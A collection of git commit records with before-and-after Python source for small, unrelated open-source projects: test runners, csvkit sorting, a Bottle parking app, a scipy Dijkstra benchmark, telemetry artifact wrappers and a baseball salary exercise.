57b743a411d673842bbf60dc7cf09e27bd8bfe2f | increase verbosity | xflr6/bitsets,pombredanne/bitsets | run-tests.py | run-tests.py | #!/usr/bin/env python3
"""Run the tests with https://pytest.org."""
import pathlib
import platform
import sys
import pytest
SELF = pathlib.Path(__file__)
ARGS = [#'--pdb',
#'--exitfirst',
]
if platform.system() == 'Windows' and 'idlelib' in sys.modules:
ARGS += ['--capture=sys', '--color=no']
print('run', [SELF.name] + sys.argv[1:])
args = ARGS + sys.argv[1:]
print(f'pytest.main({args!r})')
sys.exit(pytest.main(args))
| #!/usr/bin/env python3
"""Run the tests with https://pytest.org."""
import platform
import sys
import pytest
ARGS = [#'--pdb',
#'--exitfirst',
]
if platform.system() == 'Windows' and 'idlelib' in sys.modules:
ARGS += ['--capture=sys', '--color=no']
sys.exit(pytest.main(ARGS + sys.argv[1:]))
| mit | Python |
d3cbcfa3d134ef7ce158f229eff75a83418afc52 | Write the extraction script properly. | hande-qmc/hande,hande-qmc/hande,hande-qmc/hande,hande-qmc/hande,hande-qmc/hande | tools/dmqmc/extract_n_k.py | tools/dmqmc/extract_n_k.py | #!/usr/bin/env python
'''Extract the momentum distribution from an analysed DMQMC simulation.'''
import pandas as pd
import numpy as np
import sys
def main(args):
if (len(sys.argv) < 2):
print ("Usage: extract_n_k.py file bval")
sys.exit()
bval = float(sys.argv[2])
data = pd.read_csv(sys.argv[1], sep=r'\s+').groupby('Beta').get_group(bval)
mom = [c for c in data.columns.values if 'n_' in c and '_error' not in c]
mome = [c for c in data.columns.values if 'n_' in c and '_error' in c]
vals = [float(c.split('_')[1]) for c in mom]
n_k = (data[mom].transpose()).values
n_k_error = (data[mome].transpose()).values
n_k_error[np.isnan(n_k_error)] = 0
frame = pd.DataFrame({'Beta': bval, 'k': vals, 'n_k': n_k.ravel(), 'n_k_error':
n_k_error.ravel()})
print (frame.to_string(index=False))
if __name__ == '__main__':
main(sys.argv[1:])
| #!/usr/bin/env python
'''Extract the momentum distribution from a analysed DMQMC simulation.'''
import pandas as pd
import numpy as np
import sys
# [review] - JSS: use if __name__ == '__main__' and functions so code can easily be reused in another script if necessary.
if (len(sys.argv) < 2):
print ("Usage: extract_n_k.py file bval")
sys.exit()
bval = float(sys.argv[2])
data = pd.read_csv(sys.argv[1], sep=r'\s+').groupby('Beta').get_group(bval)
mom = [c for c in data.columns.values if 'n_' in c and '_error' not in c]
mome = [c for c in data.columns.values if 'n_' in c and '_error' in c]
vals = [float(c.split('_')[1]) for c in mom]
n_k = (data[mom].transpose()).values
n_k_error = (data[mome].transpose()).values
n_k_error[np.isnan(n_k_error)] = 0
frame = pd.DataFrame({'Beta': bval, 'k': vals, 'n_k': n_k.ravel(), 'n_k_error':
n_k_error.ravel()})
print (frame.to_string(index=False))
| lgpl-2.1 | Python |
71647b64ca6cb29ab7f21127df4378721fea328d | Fix run_tests.py on windows | ucoin-io/cutecoin,ucoin-io/cutecoin,ucoin-io/cutecoin | run_tests.py | run_tests.py | import sys
import os
import signal
import unittest
import subprocess
import time
import shlex
cmd = 'python -m pretenders.server.server --host 127.0.0.1 --port 50000'
p = subprocess.Popen(shlex.split(cmd))
time.sleep(2)
# Force saves to be done in temp directory
os.environ["XDG_CONFIG_HOME"] = os.path.join(os.path.dirname(__file__), 'temp')
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'lib')))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'src')))
try:
print("Run")
runner = unittest.TextTestRunner().run(unittest.defaultTestLoader.discover(start_dir='cutecoin.tests', pattern='test_*'))
finally:
print("Terminate")
os.kill(p.pid, signal.SIGINT)
time.sleep(2)
try:
if sys.platform == "linux":
os.kill(p.pid, signal.SIGKILL)
p.kill()
print("Hard killed")
except OSError:
print("Terminated gracefully")
sys.exit(not runner.wasSuccessful()) | import sys
import os
import signal
import unittest
import subprocess
import time
import shlex
cmd = 'python -m pretenders.server.server --host 127.0.0.1 --port 50000'
p = subprocess.Popen(shlex.split(cmd))
time.sleep(2)
# Force saves to be done in temp directory
os.environ["XDG_CONFIG_HOME"] = os.path.join(os.path.dirname(__file__), 'temp')
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'lib')))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'src')))
try:
print("Run")
runner = unittest.TextTestRunner().run(unittest.defaultTestLoader.discover(start_dir='cutecoin.tests', pattern='test_*'))
finally:
print("Terminate")
os.kill(p.pid, signal.SIGINT)
time.sleep(2)
try:
os.kill(p.pid, signal.SIGKILL)
p.kill()
print("Hard killed")
except OSError:
print("Terminated gracefully")
sys.exit(not runner.wasSuccessful()) | mit | Python |
95e011ce93a38fb0157ad07aee8f7ad0df6e9315 | exit with code error if failures | buxx/synergine | run_tests.py | run_tests.py | from os import getcwd
from sys import path as ppath
ppath.insert(1,getcwd()+'/modules') # TODO: win32 compatibilite (python path)
import unittest
from lifegame.test.LifeGameTestSuite import LifeGameTestSuite
from tests.TestSuite import TestSuite
# TODO: Lister les tests ailleurs ? Recuperer les suite de tests de module auto
# (rappel: avant on utilise config.config mais il y avait un import croise)
runnable = unittest.TestSuite()
tests_suites = [TestSuite(), LifeGameTestSuite()]
for testsuite in tests_suites:
for test_case in testsuite.get_test_cases():
runnable.addTest(unittest.makeSuite(test_case))
runner=unittest.TextTestRunner()
test_result = runner.run(runnable)
if test_result.failures or test_result.errors:
exit(1)
| from os import getcwd
from sys import path as ppath
ppath.insert(1,getcwd()+'/modules') # TODO: win32 compatibilite (python path)
import unittest
from lifegame.test.LifeGameTestSuite import LifeGameTestSuite
from tests.TestSuite import TestSuite
# TODO: Lister les tests ailleurs ? Recuperer les suite de tests de module auto
# (rappel: avant on utilise config.config mais il y avait un import croise)
runnable = unittest.TestSuite()
tests_suites = [TestSuite(), LifeGameTestSuite()]
for testsuite in tests_suites:
for test_case in testsuite.get_test_cases():
runnable.addTest(unittest.makeSuite(test_case))
runner=unittest.TextTestRunner()
exit(runner.run(runnable))
| apache-2.0 | Python |
ea41856f32e78b367681060d9f0790a209c8165e | change run host | zhy0216/pillar,zhy0216/pillar | runserver.py | runserver.py | # -*- coding: utf-8 -*-
from projectname.app import app
if(__name__ == "__main__"):
app.debug = app.config["DEBUG_MODE"]
app.run(host='0.0.0.0')
| # -*- coding: utf-8 -*-
from projectname.app import app
if(__name__ == "__main__"):
app.debug = app.config["DEBUG_MODE"]
app.run()
| mit | Python |
2dc57094577175e3a925e3601f4aef52ead58585 | remove \r | anlutro/qdb,anlutro/qdb,anlutro/qdb,anlutro/qdb | qdb/models.py | qdb/models.py | from sqlalchemy import Column, Integer, Text, DateTime, Boolean
from qdb.database import Base
import re
class Quote(Base):
__tablename__ = 'quotes'
id = Column(Integer, primary_key=True)
body = Column(Text)
submitted_at = Column(DateTime)
approved = Column(Boolean)
score = Column(Integer)
def __init__(self, body, submitted_at, score=0, approved=False):
self.body = body
self.submitted_at = submitted_at
self.approved = approved
self.score = score
@staticmethod
def prepare(quote):
# remove timestamps from the start of each line in the quote
expr = re.compile(r'^[\[\(]?\d{1,2}\:?\d{2}(\:?\d{2})?(\s*(AM|PM))?[\]\)]?\s*')
lines = []
for line in quote.split('\n'):
lines.append(expr.sub('', line))
quote = '\n'.join(lines)
# replace tabs with spaces
quote = re.sub(r'\t+', ' ', quote)
# remove windows-style newline characters
quote = quote.replace('\r', '')
return quote
| from sqlalchemy import Column, Integer, Text, DateTime, Boolean
from qdb.database import Base
import re
class Quote(Base):
__tablename__ = 'quotes'
id = Column(Integer, primary_key=True)
body = Column(Text)
submitted_at = Column(DateTime)
approved = Column(Boolean)
score = Column(Integer)
def __init__(self, body, submitted_at, score=0, approved=False):
self.body = body
self.submitted_at = submitted_at
self.approved = approved
self.score = score
@staticmethod
def prepare(quote):
# remove timestamps from the start of each line in the quote
expr = re.compile(r'^[\[\(]?\d{1,2}\:?\d{2}(\:?\d{2})?(\s*(AM|PM))?[\]\)]?\s*')
lines = []
for line in quote.split('\n'):
lines.append(expr.sub('', line))
quote = '\n'.join(lines)
# replace tabs with spaces
quote = re.sub(r'\t+', ' ', quote)
return quote
| mit | Python |
3c573218ddcf0e732d226cae80bea55d44a0deb4 | change template | valdergallo/controle_de_estacionamento_pyserial | runserver.py | runserver.py | # coding=utf-8
from bottle import route, run, install, template, error, static_file
from bottle_sqlite import SQLitePlugin
# carrega o banco de dados pelo plugin do Bottle
install(SQLitePlugin(dbfile='site.db'))
@error(404)
def error404(error):
# pagina de erros
return 'Nothing here, sorry'
@route('/static/<filename:path>')
def send_static(filename):
# pagina de arquivos staticos: css, img ...
return static_file(filename, root='./static/')
@route('/')
def home(db, vaga=None):
if not vaga:
# mostra todas as vagas
c = db.execute('SELECT * FROM vagas')
else:
# mostra apenas uma vaga em especial
c = db.execute('SELECT * FROM vagas WHERE vaga = ?', (vaga,))
# transforma o conteudo SQL em uma lista de dados
rows = c.fetchall()
# envia os dados para o template
return template('vagas_bo', vagas=rows)
run(host='0.0.0.0', port=8080, debug=True)
| # coding=utf-8
from bottle import route, run, install, template, error, static_file
from bottle_sqlite import SQLitePlugin
# carrega o banco de dados pelo plugin do Bottle
install(SQLitePlugin(dbfile='site.db'))
@error(404)
def error404(error):
# pagina de erros
return 'Nothing here, sorry'
@route('/static/<filename:path>')
def send_static(filename):
# pagina de arquivos staticos: css, img ...
return static_file(filename, root='./static/')
@route('/')
def home(db, vaga=None):
if not vaga:
# mostra todas as vagas
c = db.execute('SELECT * FROM vagas')
else:
# mostra apenas uma vaga em especial
c = db.execute('SELECT * FROM vagas WHERE vaga = ?', (vaga,))
# transforma o conteudo SQL em uma lista de dados
rows = c.fetchall()
# envia os dados para o template
return template('vagas', vagas=rows)
run(host='0.0.0.0', port=8080, debug=True)
| mit | Python |
59920c85da22327c14a3b21bb3388732fc723c91 | Check status | devicehive/devicehive-python | devicehive/api_response.py | devicehive/api_response.py | class ApiResponse(object):
"""Api response class."""
SUCCESS_STATUS = 'success'
ID_KEY = 'requestId'
ACTION_KEY = 'action'
STATUS_KEY = 'status'
CODE_KEY = 'code'
ERROR_KEY = 'error'
def __init__(self, response, key=None):
self._id = response.pop(self.ID_KEY)
self._action = response.pop(self.ACTION_KEY)
self._success = response.pop(self.STATUS_KEY) == self.SUCCESS_STATUS
self._code = response.pop(self.CODE_KEY, None)
self._error = response.pop(self.ERROR_KEY, None)
if not self._success or not key:
self._response = response
return
self._response = response[key]
def id(self):
return self._id
def action(self):
return self._action
def success(self):
return self._success
def code(self):
return self._code
def error(self):
return self._error
def ensure_success(self, exception_message, transport_name):
if self._success:
return
raise ApiResponseException(exception_message, transport_name,
self._code, self._error)
def response(self):
return self._response
class ApiResponseException(Exception):
"""Api response exception."""
def __init__(self, message, transport_name, code, error):
message = '%s. Transport: %s. Code: %s. Error: %s.' % (message,
transport_name,
code, error)
Exception.__init__(self, message)
self._transport_name = transport_name
self._code = code
self._error = error
def transport_name(self):
return self._transport_name
def code(self):
return self._code
def error(self):
return self._error
| class ApiResponse(object):
"""Api response class."""
SUCCESS_STATUS = 'success'
ID_KEY = 'requestId'
ACTION_KEY = 'action'
STATUS_KEY = 'status'
CODE_KEY = 'code'
ERROR_KEY = 'error'
def __init__(self, response, key=None):
self._id = response.pop(self.ID_KEY)
self._action = response.pop(self.ACTION_KEY)
self._success = response.pop(self.STATUS_KEY) == self.SUCCESS_STATUS
self._code = response.pop(self.CODE_KEY, None)
self._error = response.pop(self.ERROR_KEY, None)
if not key:
self._response = response
return
self._response = response[key]
def id(self):
return self._id
def action(self):
return self._action
def success(self):
return self._success
def code(self):
return self._code
def error(self):
return self._error
def ensure_success(self, exception_message, transport_name):
if self._success:
return
raise ApiResponseException(exception_message, transport_name,
self._code, self._error)
def response(self):
return self._response
class ApiResponseException(Exception):
"""Api response exception."""
def __init__(self, message, transport_name, code, error):
message = '%s. Transport: %s. Code: %s. Error: %s.' % (message,
transport_name,
code, error)
Exception.__init__(self, message)
self._transport_name = transport_name
self._code = code
self._error = error
def transport_name(self):
return self._transport_name
def code(self):
return self._code
def error(self):
return self._error
| apache-2.0 | Python |
674f4d8e48eb0d764217d4c849818dc5c0daa5a2 | update version to 0.5.3 | st-tech/zr-obp | obp/version.py | obp/version.py | __version__ = "0.5.3"
| __version__ = "0.5.2"
| apache-2.0 | Python |
0a989b028a1e470a8c3422e601cdca60fb0ddf4a | Convert csvsort to agate, closes #495 | dannguyen/csvkit,onyxfish/csvkit,doganmeh/csvkit,wireservice/csvkit | csvkit/utilities/csvsort.py | csvkit/utilities/csvsort.py | #!/usr/bin/env python
import agate
import six
from csvkit.cli import CSVKitUtility, parse_column_identifiers
class CSVSort(CSVKitUtility):
description = 'Sort CSV files. Like the Unix "sort" command, but for tabular data.'
def add_arguments(self):
self.argparser.add_argument('-y', '--snifflimit', dest='sniff_limit', type=int,
help='Limit CSV dialect sniffing to the specified number of bytes. Specify "0" to disable sniffing entirely.')
self.argparser.add_argument('-n', '--names', dest='names_only', action='store_true',
help='Display column names and indices from the input CSV and exit.')
self.argparser.add_argument('-c', '--columns', dest='columns',
help='A comma separated list of column indices or names to sort by. Defaults to all columns.')
self.argparser.add_argument('-r', '--reverse', dest='reverse', action='store_true',
help='Sort in descending order.')
self.argparser.add_argument('--no-inference', dest='no_inference', action='store_true',
help='Disable type inference when parsing the input.')
def main(self):
if self.args.names_only:
self.print_column_names()
return
if self.args.no_inference:
column_types = agate.TypeTester(limit=0)
else:
column_types = None
table = agate.Table.from_csv(self.input_file, sniff_limit=self.args.sniff_limit, header=not self.args.no_header_row, column_types=column_types, **self.reader_kwargs)
column_ids = parse_column_identifiers(self.args.columns, table.column_names, self.args.zero_based)
table = table.order_by(lambda r: [(r[c] is not None, r[c]) for c in column_ids], reverse=self.args.reverse)
table.to_csv(self.output_file, **self.writer_kwargs)
def launch_new_instance():
utility = CSVSort()
utility.main()
if __name__ == "__main__":
launch_new_instance()
| #!/usr/bin/env python
import os
import agate
from csvkit import table
from csvkit.cli import CSVKitUtility, parse_column_identifiers
class CSVSort(CSVKitUtility):
description = 'Sort CSV files. Like the Unix "sort" command, but for tabular data.'
def add_arguments(self):
self.argparser.add_argument('-y', '--snifflimit', dest='snifflimit', type=int,
help='Limit CSV dialect sniffing to the specified number of bytes. Specify "0" to disable sniffing entirely.')
self.argparser.add_argument('-n', '--names', dest='names_only', action='store_true',
help='Display column names and indices from the input CSV and exit.')
self.argparser.add_argument('-c', '--columns', dest='columns',
help='A comma separated list of column indices or names to sort by. Defaults to all columns.')
self.argparser.add_argument('-r', '--reverse', dest='reverse', action='store_true',
help='Sort in descending order.')
self.argparser.add_argument('--no-inference', dest='no_inference', action='store_true',
help='Disable type inference when parsing the input.')
def main(self):
if self.args.names_only:
self.print_column_names()
return
if self.input_file.name != '<stdin>':
# Use filename as table name
table_name = os.path.splitext(os.path.split(self.input_file.name)[1])[0]
else:
table_name = 'csvsql_table'
tab = table.Table.from_csv(
self.input_file,
name=table_name,
snifflimit=self.args.snifflimit,
no_header_row=self.args.no_header_row,
infer_types=(not self.args.no_inference),
**self.reader_kwargs
)
column_ids = parse_column_identifiers(self.args.columns, tab.headers(), self.args.zero_based)
rows = tab.to_rows(serialize_dates=True)
sorter = lambda r: [(r[c] is not None, r[c]) for c in column_ids]
rows.sort(key=sorter, reverse=self.args.reverse)
rows.insert(0, tab.headers())
output = agate.writer(self.output_file, **self.writer_kwargs)
for row in rows:
output.writerow(row)
def launch_new_instance():
utility = CSVSort()
utility.main()
if __name__ == "__main__":
launch_new_instance()
| mit | Python |
a8bae77c4a096f54414062b7c5a4d9afc75682ec | Handle binary artifacts in Python 3 | catapult-project/catapult,catapult-project/catapult,catapult-project/catapult,catapult-project/catapult,catapult-project/catapult,catapult-project/catapult,catapult-project/catapult | telemetry/telemetry/internal/results/artifact_compatibility_wrapper.py | telemetry/telemetry/internal/results/artifact_compatibility_wrapper.py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Compatibility layer for using different artifact implementations through a
# single API.
# TODO(https://crbug.com/1023458): Remove this once artifact implementations are
# unified.
from __future__ import absolute_import
import logging
import os
import six
from telemetry.internal.results import story_run
from typ import artifacts
def ArtifactCompatibilityWrapperFactory(artifact_impl):
if isinstance(artifact_impl, story_run.StoryRun):
return TelemetryArtifactCompatibilityWrapper(artifact_impl)
elif isinstance(artifact_impl, artifacts.Artifacts):
return TypArtifactCompatibilityWrapper(artifact_impl)
elif artifact_impl is None:
return LoggingArtifactCompatibilityWrapper()
raise RuntimeError('Given unsupported artifact implementation %s' %
type(artifact_impl).__name__)
class ArtifactCompatibilityWrapper(object):
def __init__(self, artifact_impl):
self._artifact_impl = artifact_impl
def CreateArtifact(self, name, data):
"""Create an artifact with the given data.
Args:
name: The name of the artifact, can include '/' to organize artifacts
within a hierarchy.
data: The data to write to the artifact.
"""
raise NotImplementedError()
class TelemetryArtifactCompatibilityWrapper(ArtifactCompatibilityWrapper):
"""Wrapper around Telemetry's story_run.StoryRun class."""
def CreateArtifact(self, name, data):
if six.PY2 or isinstance(data, bytes):
mode = 'w+b'
else:
mode = 'w+'
with self._artifact_impl.CreateArtifact(name, mode=mode) as f:
f.write(data)
class TypArtifactCompatibilityWrapper(ArtifactCompatibilityWrapper):
"""Wrapper around typ's Artifacts class"""
def CreateArtifact(self, name, data):
file_relative_path = name.replace('/', os.sep)
self._artifact_impl.CreateArtifact(name, file_relative_path, data)
class LoggingArtifactCompatibilityWrapper(ArtifactCompatibilityWrapper):
"""Wrapper that logs instead of actually creating artifacts.
This is necessary because some tests, e.g. those that inherit from
browser_test_case.BrowserTestCase, don't currently have a way of reporting
artifacts. In those cases, we can fall back to logging to stdout so that
information isn't lost. However, to prevent cluttering up stdout, we only log
the first 100 characters.
"""
def __init__(self):
super(LoggingArtifactCompatibilityWrapper, self).__init__(None)
def CreateArtifact(self, name, data):
# Don't log binary files as the utf-8 encoding will cause errors.
# Note that some tests use the .dmp extension for both crash-dump files and
# text files.
if os.path.splitext(name)[1].lower() in ['.png', '.dmp']:
return
logging.warning(
'Only logging the first 100 characters of the %d character artifact '
'with name %s. To store the full artifact, run the test in either a '
'Telemetry or typ context.' % (len(data), name))
logging.info('Artifact with name %s: %s', name, data[:min(100, len(data))])
| # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Compatibility layer for using different artifact implementations through a
# single API.
# TODO(https://crbug.com/1023458): Remove this once artifact implementations are
# unified.
from __future__ import absolute_import
import logging
import os
from telemetry.internal.results import story_run
from typ import artifacts
def ArtifactCompatibilityWrapperFactory(artifact_impl):
if isinstance(artifact_impl, story_run.StoryRun):
return TelemetryArtifactCompatibilityWrapper(artifact_impl)
elif isinstance(artifact_impl, artifacts.Artifacts):
return TypArtifactCompatibilityWrapper(artifact_impl)
elif artifact_impl is None:
return LoggingArtifactCompatibilityWrapper()
raise RuntimeError('Given unsupported artifact implementation %s' %
type(artifact_impl).__name__)
class ArtifactCompatibilityWrapper(object):
def __init__(self, artifact_impl):
self._artifact_impl = artifact_impl
def CreateArtifact(self, name, data):
"""Create an artifact with the given data.
Args:
name: The name of the artifact, can include '/' to organize artifacts
within a hierarchy.
data: The data to write to the artifact.
"""
raise NotImplementedError()
class TelemetryArtifactCompatibilityWrapper(ArtifactCompatibilityWrapper):
"""Wrapper around Telemetry's story_run.StoryRun class."""
def CreateArtifact(self, name, data):
with self._artifact_impl.CreateArtifact(name) as f:
f.write(data)
class TypArtifactCompatibilityWrapper(ArtifactCompatibilityWrapper):
"""Wrapper around typ's Artifacts class"""
def CreateArtifact(self, name, data):
file_relative_path = name.replace('/', os.sep)
self._artifact_impl.CreateArtifact(name, file_relative_path, data)
class LoggingArtifactCompatibilityWrapper(ArtifactCompatibilityWrapper):
"""Wrapper that logs instead of actually creating artifacts.
This is necessary because some tests, e.g. those that inherit from
browser_test_case.BrowserTestCase, don't currently have a way of reporting
artifacts. In those cases, we can fall back to logging to stdout so that
information isn't lost. However, to prevent cluttering up stdout, we only log
the first 100 characters.
"""
def __init__(self):
super(LoggingArtifactCompatibilityWrapper, self).__init__(None)
def CreateArtifact(self, name, data):
# Don't log binary files as the utf-8 encoding will cause errors.
# Note that some tests use the .dmp extension for both crash-dump files and
# text files.
if os.path.splitext(name)[1].lower() in ['.png', '.dmp']:
return
logging.warning(
'Only logging the first 100 characters of the %d character artifact '
'with name %s. To store the full artifact, run the test in either a '
'Telemetry or typ context.' % (len(data), name))
logging.info('Artifact with name %s: %s', name, data[:min(100, len(data))])
| bsd-3-clause | Python |
bea80411c13ed72b1e7d5a5ac79fdba64b4b4661 | Add star graph for sparse.csgraph.dijkstra benchmark | scipy/scipy,scipy/scipy,scipy/scipy,scipy/scipy,scipy/scipy,scipy/scipy | benchmarks/benchmarks/sparse_csgraph_djisktra.py | benchmarks/benchmarks/sparse_csgraph_djisktra.py | """benchmarks for the scipy.sparse.csgraph module"""
import numpy as np
import scipy.sparse
from .common import Benchmark, safe_import
with safe_import():
from scipy.sparse.csgraph import dijkstra
class Dijkstra(Benchmark):
params = [
[30, 300, 900],
[True, False],
['random', 'star']
]
param_names = ['n', 'min_only', 'format']
def setup(self, n, min_only, format):
rng = np.random.default_rng(1234)
if format == 'random':
# make a random connectivity matrix
data = scipy.sparse.rand(n, n, density=0.2, format='csc',
random_state=42, dtype=np.bool_)
data.setdiag(np.zeros(n, dtype=np.bool_))
self.data = data
elif format == 'star':
rows = [0 for i in range(n - 1)] + [i + 1 for i in range(n - 1)]
cols = [i + 1 for i in range(n - 1)] + [0 for i in range(n - 1)]
weights = [i + 1 for i in range(n - 1)] * 2
self.data = scipy.sparse.csr_matrix((weights, (rows, cols)),
shape=(n, n))
# choose some random vertices
v = np.arange(n)
rng.shuffle(v)
self.indices = v[:int(n*.1)]
def time_dijkstra_multi(self, n, min_only, format):
dijkstra(self.data,
directed=False,
indices=self.indices,
min_only=min_only)
| """benchmarks for the scipy.sparse.csgraph module"""
import numpy as np
import scipy.sparse
from .common import Benchmark, safe_import
with safe_import():
from scipy.sparse.csgraph import dijkstra
class Dijkstra(Benchmark):
params = [
[30, 300, 900],
[True, False]
]
param_names = ['n', 'min_only']
def setup(self, n, min_only):
rng = np.random.default_rng(1234)
# make a random connectivity matrix
data = scipy.sparse.rand(n, n, density=0.2, format='csc',
random_state=42, dtype=np.bool_)
data.setdiag(np.zeros(n, dtype=np.bool_))
self.data = data
# choose some random vertices
v = np.arange(n)
rng.shuffle(v)
self.indices = v[:int(n*.1)]
def time_dijkstra_multi(self, n, min_only):
dijkstra(self.data,
directed=False,
indices=self.indices,
min_only=min_only)
| bsd-3-clause | Python |
b26ba0d29c39095044721d60ecb250b011cf844b | Add link in documentation | sgaynetdinov/py-vkontakte | vk/attachments.py | vk/attachments.py | # coding=utf-8
def get_attachments(attachments_json):
if not attachments_json:
return None
attachment_items = []
for attachment_json in attachments_json:
if attachment_json.get("type") == "photo":
attachment_items.append(AttachmentPhoto.from_json(attachment_json.get("photo")))
return attachment_items
class AttachmentPhoto(object):
"""
https://vk.com/dev/objects/photo
"""
__slots__ = ("id", "album_id", "owner_id", "user_id", "text", "type", "unixtime", "photo_75", "photo_130", "photo_604", "photo_807", "photo_1280",
"photo_2560")
@classmethod
def from_json(cls, attachment_json):
attachment = cls()
attachment.id = attachment_json.get("id")
attachment.album_id = attachment_json.get("album_id")
attachment.owner_id = attachment_json.get("owner_id")
attachment.user_id = attachment_json.get("user_id")
attachment.text = attachment_json.get("text")
attachment.type = attachment_json.get("type")
attachment.unixtime = attachment_json.get("date")
attachment.photo_75 = attachment_json.get("photo_75")
attachment.photo_130 = attachment_json.get("photo_130")
attachment.photo_604 = attachment_json.get("photo_604")
attachment.photo_807 = attachment_json.get("photo_807")
attachment.photo_1280 = attachment_json.get("photo_1280")
attachment.photo_2560 = attachment_json.get("photo_2560")
return attachment
def __repr__(self):
return u"<AttachmentPhoto: id{0}>".format(self.id)
| # coding=utf-8
def get_attachments(attachments_json):
if not attachments_json:
return None
attachment_items = []
for attachment_json in attachments_json:
if attachment_json.get("type") == "photo":
attachment_items.append(AttachmentPhoto.from_json(attachment_json.get("photo")))
return attachment_items
class AttachmentPhoto(object):
__slots__ = ("id", "album_id", "owner_id", "user_id", "text", "type", "unixtime", "photo_75", "photo_130", "photo_604", "photo_807", "photo_1280",
"photo_2560")
@classmethod
def from_json(cls, attachment_json):
attachment = cls()
attachment.id = attachment_json.get("id")
attachment.album_id = attachment_json.get("album_id")
attachment.owner_id = attachment_json.get("owner_id")
attachment.user_id = attachment_json.get("user_id")
attachment.text = attachment_json.get("text")
attachment.type = attachment_json.get("type")
attachment.unixtime = attachment_json.get("date")
attachment.photo_75 = attachment_json.get("photo_75")
attachment.photo_130 = attachment_json.get("photo_130")
attachment.photo_604 = attachment_json.get("photo_604")
attachment.photo_807 = attachment_json.get("photo_807")
attachment.photo_1280 = attachment_json.get("photo_1280")
attachment.photo_2560 = attachment_json.get("photo_2560")
return attachment
def __repr__(self):
return u"<AttachmentPhoto: id{0}>".format(self.id)
| mit | Python |
868bea37f139ac846f1856af4a5ae659d654c755 | break down player dict more logically | rnagle/pycar,tommeagher/pycar14,tommeagher/pycar14,ireapps/pycar | project2/baseball.py | project2/baseball.py | import csv
import operator
import math
#First, let's see what kind of data we have to work with
def calculate_top10 (filename):
#Open the salary csv
salaries_object = open(filename, 'rb')
#Make the file object usable
salary_data = csv.reader(salaries_object)
#Create your header row and look at what is in here
header_row = salary_data.next()
#Find the index of the year and player id
print header_row
#Check the type of the year column to see if it is a string or int
sample_data = salary_data.next()
print '%s is %s' % (sample_data[0], type(sample_data[0]))
#Because we're on the first row of data, we need to
#return to the top before we do anything with this.
#We do this by resetting the pointer in the original file.
salaries_object.seek(0)
#Arrange in descending order of salary
#Remember that lists always keep their order!
sorted_salaries = sorted(salary_data, key=operator.itemgetter(4), reverse=True)
#Create a list of the top 10%
top_percentile = len(sorted_salaries) * .10
#Round it!
rounded_salaries = math.floor(top_percentile)
#We don't want decimal points (you can't have part of a player)
#so cast to an int
int_salaries = int(rounded_salaries)
#You could do the above steps in one line like this:
#int(math.floor(len(sorted_salaries * .10)))
#Now let's create our final list, of just the highest-paid players
cream_of_the_crop = sorted_salaries[:int_salaries]
return cream_of_the_crop
#We are going to be working with dictionaries to make things easier
def create_player_dict(filename, cream_of_the_crop):
#Open the csv
salaries_object = open(filename, 'rb')
#This time, let's use DictReader,
#which maps the header row's values to each item in each row
player_dict = csv.DictReader(salaries_object)
#Create new list of only 2013 information
#NOTE: You can't start a variable with a number, so 2013_salaries won't work
salaries_2013 = {}
for row in player_dict:
#Using DictReader allows us to access rows by their column name!
year = row["yearID"]
if year == '2013':
print row["playerID"]
#Create a record for each player's ID and assign it the salary
salaries_2013[row["playerID"]] = row["salary"]
#TODO:
#Open the master csv
#Loop over the master csv to find the player IDs in the player dict
#Add names, birth state and birth country to the dict
#TODO: Make this so we can walk a folder structure
salary_file = 'data/2013/Salaries.csv'
top10 = calculate_top10(salary_file)
create_player_dict(top10)
| import csv
#TODO: Make this so we can walk a folder structure
SALARIES_FILE = 'data/2013/Salaries.csv'
#First, let's see what kind of data we have to work with
def explore_salary_csv(filename):
#Open the salary csv
salaries_object = open(SALARIES_FILE, 'rb')
#Make the file object usable
salary_data = csv.reader(salaries_object)
#Create your header row
header_row = salary_data.next()
#Find the index of the year and player id
print header_row
#Check the type of the year column to see if it is a string or int
sample_data = salary_data.next()
print '%s is %s' % (sample_data[0], type(sample_data[0]))
#We are going to be working with dictionaries to make things easier
def use_dicts(filename):
#Open the csv
salaries_object = open(SALARIES_FILE, 'rb')
#This time, let's use DictReader,
#which maps the header row's values to each item in each row
salary_data = csv.DictReader(salaries_object)
#Create new list of only 2013 information
#NOTE: You can't start a variable with a number, so 2013_salaries won't work
salaries_2013 = {}
for row in salary_data:
#Using DictReader allows us to access rows by their column name!
year = row["yearID"]
if year == '2013':
print row
#Arrange in descending order of salary
#Create a dict with salaries and playerIDs of the top 10%
#Open the master csv
#Loop over the master csv to find the player IDs in the player dict
#Add names, birth state and birth country to the dict
for row in salary_data:
for item in row:
print '%s is type %s' % (item, type(item))
| mit | Python |
4f01013e6a958580c106709de0d37b7ca192202f | Add saturated fat and trans fat | 11craft/django-usda,nicksanders/django-usda | usda/facts.py | usda/facts.py | from .models import Nutrient, NutrientData
ENERGY = 208
TOTAL_FAT = 204
SATURATED_FAT = 606
TRANS_FAT = 605
class NutritionFacts(object):
def __init__(self, food, calories=None, grams=100):
self.food = food
self._calories = calories
self._grams = grams
energy_nutrient = Nutrient.objects.get(number=ENERGY)
self.energy_100g = NutrientData.objects.get(food=food, nutrient=energy_nutrient).nutrient_value
self.data_cache = {}
@property
def calories(self):
return self._calories
@calories.setter
def calories(self, val):
self._calories = val
self._grams = 100.0 * val / self.energy_100g
@property
def grams(self):
return self._grams
@grams.setter
def grams(self, val):
self._calories = self.energy_100g * val / 100.0
self._grams = val
@property
def totalfat_g(self):
return self._nutrient_amount(TOTAL_FAT)
@property
def saturatedfat_g(self):
return self._nutrient_amount(SATURATED_FAT)
@property
def transfat_g(self):
return self._nutrient_amount(TRANS_FAT)
def _nutrient_amount(self, number):
if number not in self.data_cache:
self.data_cache[number] = NutrientData.objects.get(
food=self.food, nutrient__number=number).nutrient_value
return self.data_cache[number] * self.grams / 100.0
| from .models import Nutrient, NutrientData
ENERGY = 208
TOTAL_FAT = 204
class NutritionFacts(object):
def __init__(self, food, calories=None, grams=100):
self.food = food
self._calories = calories
self._grams = grams
energy_nutrient = Nutrient.objects.get(number=208)
